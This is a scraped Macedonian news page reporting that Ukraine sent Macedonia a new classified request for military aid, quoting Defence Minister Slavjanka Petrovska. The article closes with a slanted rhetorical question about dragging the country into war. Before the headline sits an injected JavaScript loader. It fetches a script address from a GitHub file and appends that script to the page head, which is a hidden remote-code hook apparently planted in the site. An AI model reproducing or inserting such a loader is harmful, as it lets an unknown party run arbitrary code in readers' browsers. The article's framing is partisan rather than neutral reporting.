;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Вовлекување во војна: Украина испратила барање до Македонија за нова воена помош - Антропол
АктуелноИнтернационално

Вовлекување во војна: Украина испратила барање до Македонија за нова воена помош

Украина испрати ново барање до Македонија за дополнителна воена помош, изјави на 18 мај министерката за одбрана Славјанка Петровска. Таа рече дека новото барање од украинската страна е класифицирано и дека во моментов го разгледува Генералштабот.

„Минатата недела пристигнато е ново барање, се разбира тоа е класифицирано од украинската страна, се разгледува во Генералштабот на армијата дали можеме и во која мера да одговориме. Ако добиеме позитивно мислење, се разбира соодветно ќе ја известиме јавноста доколку Владата донесе дополнителна одлука“, изјави Петровска.

Таа денеска зборуваше по завршувањето на брифингот по повод отпочнување на активностите на мултинационалната вежба „Брз одговор 23“.

Во јавноста се поставува прашањето, дали со испраќањето на оружје во Украина, кое несомнено ја ослабува и разоружува македонската армија, се вовлекува земјата во конфлик?